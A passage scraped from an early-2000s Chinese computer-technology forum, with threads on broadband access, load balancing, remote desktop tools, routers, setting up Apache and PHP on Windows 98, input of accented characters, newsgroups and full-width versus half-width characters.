所有tcp/ip协议的链接都是要设置ip和dns的。而且都是分手动设置和自动分配的。不是他专有。

學生時代
wx@ay

看不懂
积分：7349
发帖：5076
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-01-05 12:33:37 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
引用:
目前技术成熟、在实际中能够使用的宽带接入手段主要有以下几种：
1．DSL（数字用户环路）技术，这类技术最主要的特征是通过现有的双绞铜线（即普通的电话线）进行高速数据传送。这类技术中ADSL技术、VDSL技术以及HOMEPNA技术在实际中使用较多。其中ADSL技术覆盖范围较广（最远在5公里左右），并且以非对称方式工作（上行800kbit/s，下行6Mbit/s），所以一般以电话局所为中心提供宽带接入，通常不针对特定的小区。HOMEPNA由于技术传输带宽不高（HOMEPNA1.0传输带宽不超过2Mbit/s），传输距离相对较短（一般在300到600米），但价格便宜，常常作为ADSL业务的补充。VDSL技术特点非常适合小区信息化建设的要求，VDSL能够提供对称的10Mbit/s的双向接入，覆盖范围最高可以达到1000米左右，完全能够满足小区信息化的接入带宽要求。
2．“FTTB+LAN”（光纤到小区结合综合布线）技术，该方案是铺设五类线将小区建设成为一个局域网，然后通过光纤与城域网高速连接。由于该方案需要重新布线而不使用电话线，因而适合所有的电信运营商或驻地网建设公司。通过选择合适的局域网交换机，用户可以获得10Mbit/s甚至100Mbit/s的接入速度。“FTTB+LAN”技术主要利用现有的计算机网络技术，尽管还需要不断的改进，但目前是小区信息化建设首选的方案。

FTTB+LAN网络结构示意图：

一般来说，固定IP资源是有限的，所以不可能所有用户都使用固定IP，
因此基本上是采用VLAN技术，内网为固定IP，真正连接INTERNET就不是了。
FTTB+LAN是用的局域网的私网地址，一方面外界无法攻击用户的计算机，另一方面，外界也无法通过IP地址查到用户的计算机，这个对于个人用户来说也是一个好事。

Think like a Genius.

忘掉她/忘掉你没有的东西/忘掉别人的东西/忘掉你失去以后就不能再得到地东西/忘掉仇恨/忘掉屈辱/就像犀牛忘记草原/水鸟忘记湖泊/地狱忘记天堂/落叶忘记风/但是我决定不忘掉你

大哥

超级用户
积分：318
发帖：111
来自：
注册：2001-12-20
 发表于 2002-01-05 13:30:19 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
呵呵，其实就是以太局域网技术＋光纤远程连接，搞懂了Ethernet就会清楚了。

纠正二楼的说法：vlan的作用是限制LAN内用户互联的，自动分配IP设置（包括DNS、Gateway等一整套设置）的技术叫做DHCP。 手动设置IP的唯一目的是获得固定IP（当然需要电信局允许你手动设置，呵呵）。

老哥我知道的就这么多了。
上一贴 | 下一贴
快速回复 | 主题：HTTB+Lan宽带的技术内幕？？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


什么是缓存加速服务,负载均衡服务？

计算机技术
什么是缓存加速服务,负载均衡服务？

上一贴 | 下一贴
发表人 | 主题: 什么是缓存加速服务,负载均衡服务？
ajiao 终级用户 积分：544 发帖：172 来自：0412 注册：2001-03-14 | 发表于 2002-01-09 08:27:15 按此观看ajiao的个人资料 按此发邮件给ajiao ajiao 的 oicq 是870922,查看 870922 的资料 收藏该主题供以后查看 发送悄悄话给ajiao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ajiao的IP 我不是很了解，领导还想让我操作，请帮我看看哪里有很好的资料，解释解释，谢谢。 到底有没有无需置疑的事情呢？
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2002-01-09 11:03:51 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 缓存加速服务针对数据中心所有存在WWW应用的用户提供高速缓存服务，从而加快HTTP请求的响应速度，并且减轻后台WWW服务器的负载 负载均衡指的是采用智能交换机对用户的请求进行分析，并指向最佳的服务器。由于采用这种分布式结构，网站性能和可靠性可以得到提高，从而提高客户对网站体验的满意度 http://www.ccidnet.com/tech/hard/2001/04/29/58_2092.html [这消息被yunbin编辑过(编辑时间2002-01-09 11:05:37)] A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：什么是缓存加速服务,负载均衡服务？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


求助！急！

计算机技术
求助！急！

上一贴 | 下一贴
发表人 | 主题: 求助！急！
xqfengyue 初级用户 积分：124 发帖：37 来自：河北 注册：2001-06-24 | 发表于 2002-01-10 10:37:34 按此观看xqfengyue的个人资料 按此发邮件给xqfengyue xqfengyue 的 oicq 是7517323,查看 7517323 的资料 收藏该主题供以后查看 发送悄悄话给xqfengyue 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqfengyue的IP 有什么办法使我可以远程访问别的地方的机子呢？我在外地，但是想访问我原来地方的机子，用一些里面的东西，我应该用什么工具怎么操作呢？急呀，因为东西太大，所以也不便传过来。不知道我说的是不是清楚!着急! [-COMMON-]
风梦扬 超级用户 积分：331 发帖：125 来自：广州 注册：2000-10-21 | 发表于 2002-01-10 23:13:34 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP 一个终端服务客户端的软件即可 比如 XP 自带的 "远程桌面连接" 华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质. 想和NJ们互动么?也欢迎各位一起来参与我们的节目! 进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.
2smile 活着就好 积分：1622 发帖：1907 来自：SD 注册：2001-05-13 | 发表于 2002-01-11 00:36:57 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP 高级一点用pcanywher，如果省事就用2k的远程管理吧 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
樱 终级用户 积分：1308 发帖：401 来自：▓★☆★☆★▓ 注册：2000-12-11 | 发表于 2002-01-11 14:03:04 按此观看樱的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给樱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看樱的IP pcanywhere 18J [w]
上一贴 | 下一贴
快速回复 | 主题：求助！急！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


网络技术问题，请指点迷津！！

计算机技术
网络技术问题，请指点迷津！！

上一贴 | 下一贴
发表人 | 主题: 网络技术问题，请指点迷津！！
yixinguy78 终级用户 积分：526 发帖：188 来自：china 注册：2001-02-10 | 发表于 2002-01-15 14:40:17 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 请问高端路由和低端路由有什么区别？？？？？ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2002-01-15 14:46:37 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 怎么看着像作业题~ 用户选择路由器时，多从技术角度来考虑，如可延展性、路由协议互操作性、广域数据服务支持、内部ATM支持、SAN集成能力等。另外，选择路由器还应遵循如下基本原则：即标准化原则、技术简单性原则、环境适应性原则、可管理性原则和容错冗余性原则。对于高端路由器，更多的还应该考虑是否和如何适应骨干网对网络高可靠性、接口高扩展性以及路由查找和数据转发的高性能要求。高可靠性、高扩展性和高性能的“三高”特性是高端路由器区别于中、低端路由器的关键所在 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
yixinguy78 终级用户 积分：526 发帖：188 来自：china 注册：2001-02-10 | 发表于 2002-01-15 15:05:05 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 精辟，听君一席话，胜找一下午书，非常感谢，看来我这次的作业可以的A了，谢谢强盗！！！ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
上一贴 | 下一贴
快速回复 | 主题：网络技术问题，请指点迷津！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请教大虾们

计算机技术
请教大虾们

上一贴 | 下一贴
发表人 主题: 请教大虾们
蓝影

初级用户
积分：48
发帖：13
来自：珠海广东中国
注册：2001-12-24
 发表于 2002-01-17 08:18:11 按此观看蓝影的个人资料 按此发邮件给蓝影 收藏该主题供以后查看 发送悄悄话给蓝影 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝影的IP
win98下能不能安装并使用apache？如果能装的话要注意什么？

沉指江山，默划乾坤。
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-01-17 10:10:57 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
引用:

    下载Apache for win32,下载后的文件解压，到一个目录，运行Setup程序，会提示整个安装的过程。比如安装到一个目录（c:apache）下。然后，在该目录的字目录conf下有一个名为httpd.conf的文本文件，用文本编辑器编辑它，将“#BindAddress *”这一行改为“BindAddress 127.0.0.1”（如果在局域上可以设定为你的本机IP）.好了，就是如此简单，开始运行Apache吧，接着你在浏览器中输入：http://127.0.0.1应该就会看到Apache服务器的效果了。需要说明的是，如果你的本机已经在运行一个其它的Web服务器了，你可以通过修改端口来区别开来，你可以在httpd.conf文件的“Port 80”改为“Port 81”或其它没有运行服务的端口。一般来说，FTP端口为21... ，那么，你在浏览器中输入“http://127.0.0.1:81”就可以了（注意：单机用户必须把#ServerName new.host.name前的#号也去掉，否则可能安装失败）。

    编辑httpd.conf文件（注意：该文件一般不要轻易改动）,在该文件中加一行
Alias /test/ "c:/php3/test/" 表示将c:/php3/test/目录设置为虚拟目录/test/(目录名可任定),那么你在c:/php3/test/下的文件，就可以通过在浏览器中输入“http://127.0.0.1/test/文件”访问。
在httpd.conf文件中加入以下几行：
ScriptAlias /php3/ "c:/php3/"
AddType application/x-httpd-php3 .php
Action application/x-httpd-php3 "/php3/php.exe"

使其可以支持PHP.

在开始菜单中打开或关闭Apache,在test目录下编写一个最简单的PHP程序:

<?
echo "Ok!";
?>

在浏览器中(http://127.0.0.1/test/hello.php)看看有没有成功？

引自：PHP——PHP + MySQL + Apache 在WIN98下安装的体会和注意点

引用:

    安装APACHE1.3.12

软件获得:http://www.apache.org;http://www.phpchina.com;http://phpuser.com;http://www.phpsite.net。

软件的安装很简单,下载完后直接双击执行安装.

配置conf目录下的httpd.conf文件.
#BindAddress *改为 BindAddress 127.0.0.1
#Servername new.host.name改为Servername localhost

出现类似的错误的原因可能就是没有指定servername.
"cannot determine local host name,use servername to set it manually"

好了，你的apache已经可以运行了!
运行你的apache.应该显示：

Apache/1.3.12 (Win32) running...
注意,这里假设您的APACHE是安装在默认目录下即:
C:/Program Files/Apache Group/Apache
否则文档中的serverroot以及docmentroot等也要更改。比如你是安装在c:\apache下.那么
serverroot = c:/apache docmentroot = c:/apache/htdocs
其他选项依次类推

如果你的机器还安装了别的服务器程序,而你又希望他们共同为你效劳那么你就必须改一下port ,默认为80,你可以改为81或者8080.不要使用其他一些常用的端口比如21,23, 25等(废话^_^).

好了，下面让你的APACHE来支持PHP4. 加上下面这么几句,基本上就可以了!

    ScriptAlias /php4/ "C:/php4/"
    AddType application/x-httpd-php4 .php
    AddType application/x-httpd-php4 .php3
    AddType application/x-httpd-php4 .php4
    Action application/x-httpd-php4 "/php4/php.exe"

;不要写成
;Action application/x-httpd-php4 "c:/php4/php.exe"
;否则会出错的.

在httpd.conf中分别找到相似的行,加进去,这样容易维护一些. 关于默认启动文档:apache的默认启动文档为index.html DirectoryIndex index.html 把它改为你想要的默认启动文档
想要支持更多文档要象这样:
DirectoryIndex index.htm
DirectoryIndex index.php
DirectoryIndex index.php3
DirectoryIndex index.php4

完成了! 写一个测试文件:

    <?
        phpinfo();
    ?>
保存为info.php

在浏览器中输入http://localhost/info.php
别忘了要先运行APACHE啊！

引自：Windows 98下安装Apache(PWS) PHP4 MySQL phpMyAdmin的方法

[这消息被啸编辑过(编辑时间2002-01-17 10:14:22)]

Blueidea Web Team.
Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：请教大虾们
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


推荐一个屏幕动态抓取软件

计算机技术
推荐一个屏幕动态抓取软件

上一贴 | 下一贴
发表人 主题: 推荐一个屏幕动态抓取软件
2smile

活着就好
积分：1622
发帖：1907
来自：SD
注册：2001-05-13
 发表于 2002-01-21 11:22:05 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 收藏该主题供以后查看 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
GifGifGif

官方网站
http://www.peda.com/

Sample:

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-21 12:37:38 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
这样就可以制作教程了啊：）

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2002-01-21 23:51:57 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
我觉得Snagit很好用,在windows下可以抓图,DOS下也可以,而且保存的图象格式也很多.

Dripping water wears away a stone.
上一贴 | 下一贴
快速回复 | 主题：推荐一个屏幕动态抓取软件
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我想买服务器，不知道买什么样的好

计算机技术
我想买服务器，不知道买什么样的好

上一贴 | 下一贴
发表人 | 主题: 我想买服务器，不知道买什么样的好
fjt 初级用户 积分：107 发帖：30 来自： 注册：2001-12-22 | 发表于 2001-12-27 17:43:43 按此观看fjt的个人资料 该用户不允许显示它的电子邮件 fjt 的 oicq 是8085563,查看 8085563 的资料 收藏该主题供以后查看 发送悄悄话给fjt 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fjt的IP 我想做虚拟主机服务商，买什么档次的服务器好，什么价位？ 最好有全套的解决方案和这方面的经验，谢谢各位。
大哥 超级用户 积分：318 发帖：111 来自： 注册：2001-12-20 | 发表于 2001-12-28 09:03:18 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP 两方面的考虑： 性能：决定支持的并发连接数，我的PII266+512M内存，支持并发连接数为200个(httpd+Mysqld)； 质量：能够长期稳定地工作。 因此，首先应该确定品牌，像进口的HP、IBM，国产的曙光、浪潮、联想都可以考虑，然后看配置，最好是Ultra SCSI，RAID，温度监控等等一应俱全。 注意一般标配只有128或256M的内存，要作为服务器用，512到1024M的内存是不可少的。国产价格在30000左右（PIII 1G×2，512M，SCSI 18G×2，RAID卡），差不多的配置HP的要50000左右。自己决定买什么吧。 老哥我知道的就这么多了。
上一贴 | 下一贴
快速回复 | 主题：我想买服务器，不知道买什么样的好
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎么在中文WIN98下输入西班牙字

计算机技术
怎么在中文WIN98下输入西班牙字

上一贴 | 下一贴
发表人 主题: 怎么在中文WIN98下输入西班牙字
54雨寒

终级用户
积分：623
发帖：277
来自：ChangChun
注册：2001-04-21
 发表于 2001-12-13 10:24:29 按此观看54雨寒的个人资料 按此发邮件给54雨寒 访问54雨寒的主页 54雨寒 的 oicq 是11207164,查看 11207164 的资料 收藏该主题供以后查看 发送悄悄话给54雨寒 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看54雨寒的IP
UP

http://n1web.home.chinaren.com
看……看……看什么看，不就是比你帅点吗:-P
carl

Violinist
积分：2514
发帖：995
来自：安徽，合肥
注册：2000-12-28
 发表于 2001-12-13 10:32:01 按此观看carl的个人资料 按此发邮件给carl 访问carl的主页 发送悄悄话给carl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看carl的IP
天哪，如果你确信在座的中间有能看懂西班牙字的，仅管拿一段来看看先！

╰○︿
  ︿ )
    (
northice

终级用户
积分：503
发帖：454
来自：来的地方
注册：2001-02-22
 发表于 2001-12-13 12:26:40 按此观看northice的个人资料 按此发邮件给northice northice 的 oicq 是3418177,查看 3418177 的资料 发送悄悄话给northice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看northice的IP
我附加个问题

2000中如何输入外文字,如葡萄牙语,日语等等

是不是要字库和输入法?

YOU MUST GO,OR YOU WILL BE SAD!
kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2001-12-13 15:57:11 按此观看kjseven的个人资料 按此发邮件给kjseven 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
在中文版上我就不知道了，但是英文版的我就知道。应该是一样的。
á ----- alt+0225 ;0193 ---- &Aacute;;
é ----- alt+0233 ;0201 ---- &Eacute;;
í ----- alt+0237 ;0205 ---- &Iacute;;
ó ----- alt+0243 ;0211 ---- &Oacute;;
ú ----- alt+0250 ;0218 ---- &Uacute;;
&ntilde; ----- alt+0241 ;0209 ---- &Ntilde;;
&iquest; ----- alt+0191

我知道就这么多了，还有关于其他语言的，自己去研究吧。。。
顺便提一点，如果是windows xp 的话，可以安装语言键盘。不过当然有相应不同的打法罗。。。（上面或者显示不到打出来的字母，但你们照打就行了。）

在经典论坛，有没有人会西班牙语的？？可以叫个朋友吗？？

[这消息被kjseven编辑过(编辑时间2001-12-13 16:01:27)]

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-14 09:32:37 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
安裝了其他語言支持的話直接添加輸入法添加就可以了~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：怎么在中文WIN98下输入西班牙字
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于新闻组

计算机技术
关于新闻组

上一贴 | 下一贴
发表人 主题: 关于新闻组
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2002-01-21 16:57:39 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 收藏该主题供以后查看 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
搜索了半天没反映，只好问一下了：
1。新闻组的使用
2。好的地址
3。与论坛的比较

谢了，如果你有相关的文章，麻烦你贴一下。

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-21 21:08:22 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
在Internet这座资源宝库里，如何快速、便捷地找到自己需要的东西呢？除了正确使用搜索引擎、BBS等工具外，另一个获取资源的有效途径就是使用新闻组。所谓新闻组，就是由公司或个人把不同主题的资源（贴子）分门别类地存放在“新闻服务器”（一台连网的计算机）上，方便人们查找资料、了解时事、张贴信息、提出问题……说白了，就是一个人们在网上可以自由交流的场所。它有一个最大的好处就是信息可以像E-mail一样下载到硬盘上离线阅读，为你节省不少银子。

    阅读新闻组内容，须要借助新闻阅读软件。这里，我们以IE自带的新闻阅读组件Outlook Express为例，具体谈谈如何订阅“济南万千”（webking.online.jn.sd.cn）新闻组。

    一、基本设置

    打开Outlook Express(以下简称OE)，点击菜单栏“工具”/“帐号”，在弹出的对话框中，选择“添加”/“新闻”，这时，会弹出一个向导，帮助你完成设置。第一步，填写“姓名”，不一定要真名，昵称即可。第二步，正确填写你的E-mail地址，便于网友以后给你写信;第三步，填写服务器的域名或IP（webking.online.jn.sn.cn）;第四步，填入“友好名称”，这是填新闻组的名称，可随便填写，如:济南万千;第五步，选择连接类型，如果是普通拨号用户，选择第一项“通过本地电话线连接”，如果是局域网用户，请选择第二项“通过本地局域网连接”，单击“下一步”，再单击“完成”。OK，新闻组的设置就算完成了。

    二、订阅新闻组

    设置完成后，关闭“Internet帐号”对话框，Outlook Express会提示用户是否从添加的新闻组服务器中下载新闻组，如果用户是在线状态，选择“是”后，系统将自动连接新闻组服务器并下载新闻组，所有新闻组目录将在“全部”选项的列表框中显示出来。如果你对某些新闻组感兴趣的话，可将光标移到该新闻组标题上，单击“预订”或双击它，该新闻组标题前就会出现一个标志符号，表示该新闻组被“预订”，这时你单击“已预订”选项的列表框就可以看到已经预订的所有新闻组。如果要取消预订，可以把光标移到相应的新闻组标题上，单击“取消预订”或双击它就可以了。

    预定完后，就可以阅读。打开新闻组界面，在邮件列表中可以看到每封信的主题，如果这时你在线，阅读方式就和读普通邮件一样，用鼠标点击想读的主题就可以看见里边的内容。但在线阅读会占用较长的上网时间，最好的办法是把你感兴趣的主题下载到本地硬盘上，下线后慢慢阅读。具体做法为:在要下载的邮件处单击鼠标右键，选择“标记要下载的邮件”项，然后在“工具”栏中选择“下载该新闻讨论组”选项，Outlook Express将自动开始下载新闻讨论组，下载完毕即可离线阅读。

    三、发表观点和提出问题

    你可以在新闻服务器上发布消息或提出问题。操作步骤为:选中适合的新闻组，点击工具栏上的“新邮件”，在出现的窗口中，输入主题和正文后，点击“投递邮件”就可以了。

    如果你对正在阅读的某则消息或问题有自己的看法和见解，也可以在新闻服务器上去发表。具体作法为:选中主题，点击鼠标右键，在弹击的下拉菜单中按“回复新闻组”或“回复作者”按钮。如果“回复新闻组”，你回复的内容将被送到新闻服务器原主题之后，大家都可以看到;选“回复作者”，你的回复内容将通过E-mail直接传送给发言者本人，其他人看不到。但无论是选前者还是后者，接下来都跟发E-mail差不多，最后点击窗口上的“投递邮件”就可以了。

    四、使用技巧

    1.当你订阅了新闻组后，你会发现在OE的左栏中，除“收件箱”、“发件箱”等与E-mail有关的项目之外，又多出了一项“济南万千”，单击左边的小加号，展开该项，你会看见你已预订的组，为了提高下载效率，我们可作如下处理:右键单击新闻组标题，在弹出的菜单中选“检索标记”/“新邮件”，这时，该新闻组图标前就会出现一个小蓝箭头，这样你就不会下载以前已经下载过的帖子了。

    2.点击你想看的组，OE的右上方就会出现组里的所有帖子，这么多的帖子是不是有点乱，别急只要你点击OE右上栏“时间”、“发信人”，就可按指定的内容排序。如果只想显示特定的帖子，可按“查看”/“当前查看”，选择相应的选项即可，如显示“未读的邮件”或“回复给我的邮件”等。要是想查找某一特定的邮件，可使用“编辑”/“查找邮件”。

    3.如果想在每封帖子后边加上同样的一段话，也就是“签名”，可作如下设置:点击“工具”/“信纸”，在“新闻”子卡中按“签名”，在方框中写入一段话，最后在“在所有发出的邮件中添加该签名”前打勾就可以了。

    4.如果你经常往新闻服务器上发帖子，那么在下载新闻组时，你会把你发送的帖子也下载回来，这样会浪费你不少时间。为了避免这种事情，你可以使用筛选邮件功能:点“工具”/“新闻组筛选器”，按“添加”，在筛选目标中选所有组，在“发信人”中填入自己的昵称就OK了。

    5.如果发了一封邮件，又想在服务器中把它删除，你可以在OE右上栏右键单击自己发的邮件，在弹出的菜单中选“取消“，OE就会自动发一封帖子，命令服务器删除该文件，当然，你只能删除自己发的帖子。不过，有些服务器不支持这项功能。

    6.如果你无法给邮件作者回信，请点击“工具”/“选项”，在“常规”中，将“把Outlook Express设为默认的Simple MAPI程序”选上，重新启动后就OK了。

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 | 主题：关于新闻组
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


全角和半角有什么区别？

计算机技术
全角和半角有什么区别？

上一贴 | 下一贴
发表人 主题: 全角和半角有什么区别？
arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2001-12-10 18:46:35 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 收藏该主题供以后查看 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
如上

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
poorfish

经典圣僧
现任版主
积分：10941
发帖：3503
来自：江西萍乡
注册：2000-12-04
 发表于 2001-12-11 11:09:57 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP
这些是全角，。；“”
这些是半角 ,.;""

【DW版常见问题解答】【破废墟】

Blueidea Web Team
Moderator of DW & JS Forum

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-11 11:56:56 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
半角方式下显示时占半个汉字的位置，全角方式下显示占一 个汉字的位置

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2001-12-22 21:00:34 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
yunbin在上个帖子中说
引用:
半角方式下显示时占半个汉字的位置，全角方式下显示占一 个汉字的位置

这个回答我很满意,谢谢!

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
上一贴 | 下一贴
快速回复 | 主题：全角和半角有什么区别？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


在windowsxp中有什么好的中文输入法么？

